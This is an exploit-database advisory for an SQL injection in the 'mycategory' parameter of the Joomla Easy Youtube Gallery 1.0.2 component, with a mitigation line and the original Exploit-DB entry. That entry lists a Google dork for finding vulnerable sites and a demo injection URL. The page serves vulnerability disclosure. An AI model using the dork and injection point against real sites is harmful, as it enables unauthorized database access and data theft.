Joomla Easy Youtube Gallery 1.0.2 SQL Injection Vulnerability

vendor:

Easy Youtube Gallery

by:

Persian Hack Team

CVSS

HIGH

SQL Injection

CWE

Product Name: Easy Youtube Gallery

Affected Version From: 1.0.2

Affected Version To: 1.0.2

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2016

Joomla Easy Youtube Gallery 1.0.2 SQL Injection Vulnerability

Joomla Easy Youtube Gallery 1.0.2 is vulnerable to SQL injection. An attacker can inject malicious SQL code into the 'mycategory' parameter of the 'com_easy_youtube_gallery' component. This can be exploited to gain access to the underlying database and potentially gain access to sensitive information.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

######################
# Exploit Title :  Joomla Easy Youtube Gallery 1.0.2 SQL Injection Vulnerability
# Exploit Author : Persian Hack Team
# Vendor Homepage :  http://extensions.joomla.org/extension/easy-youtube-gallery
# Google Dork : inurl:com_easy_youtube_gallery mycategory 
# Date: 2016/03/22
# Version: 1.0.2
######################
# PoC:
# mycategory=[SQL]
# 
# Demo:
# http://server/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0%27&defaultvideo=9&Itemid=752
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Homepage : persian-team.ir
# Greetz : Milad_Hacking & FireKernel And You
######################